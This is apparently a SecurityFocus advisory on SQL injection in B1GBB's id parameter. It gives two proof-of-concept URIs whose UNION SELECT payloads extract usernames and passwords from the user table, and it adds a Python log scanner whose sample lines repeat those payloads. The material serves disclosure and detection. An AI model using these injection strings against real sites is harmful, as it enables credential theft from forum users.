B1GBB ID Parameter Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/showthread.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
http://www.example.com/showboard.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
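
The request pattern above can be hunted for in web server logs. The following is an added example, not part of the original advisory or of B1GBB: it flags requests to the two affected scripts whose `id` value is not a plain integer. It assumes combined-format access logs and that legitimate `id` values are decimal integers; the function names and sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Scripts named in the proof-of-concept URIs; both take a numeric `id`.
TARGET_SCRIPTS = {"/showthread.php", "/showboard.php"}
# Assumption: a legitimate id is a plain non-negative decimal integer.
VALID_ID = re.compile(r"[0-9]{1,10}")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def suspicious_id(uri):
    """Return the decoded id value if it is not a plain integer, else None."""
    parts = urlsplit(uri)
    if parts.path.lower() not in TARGET_SCRIPTS:
        return None
    # parse_qs decodes once; decode again to catch double-encoded input.
    for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        decoded = unquote(value)
        if not VALID_ID.fullmatch(decoded):
            return decoded
    return None


def scan(log_lines):
    """Yield (line_number, decoded_id) for every flagged request."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if match:
            hit = suspicious_id(match.group(1))
            if hit is not None:
                yield number, hit


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /showthread.php?id=42 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /showthread.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/* HTTP/1.1" 200 4096',
    '192.0.2.11 - - [01/Jan/2010:10:00:09 +0000] "GET /showboard.php?id=-1%2520union%2520all%2520select%25200 HTTP/1.1" 200 4096',
    '192.0.2.12 - - [01/Jan/2010:10:00:12 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric id -> {value!r}")
```

The same integer-only rule, enforced in the application before the value reaches the query, closes the injection point that the log check only observes.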


 

Copyright 2010, SecurityFocus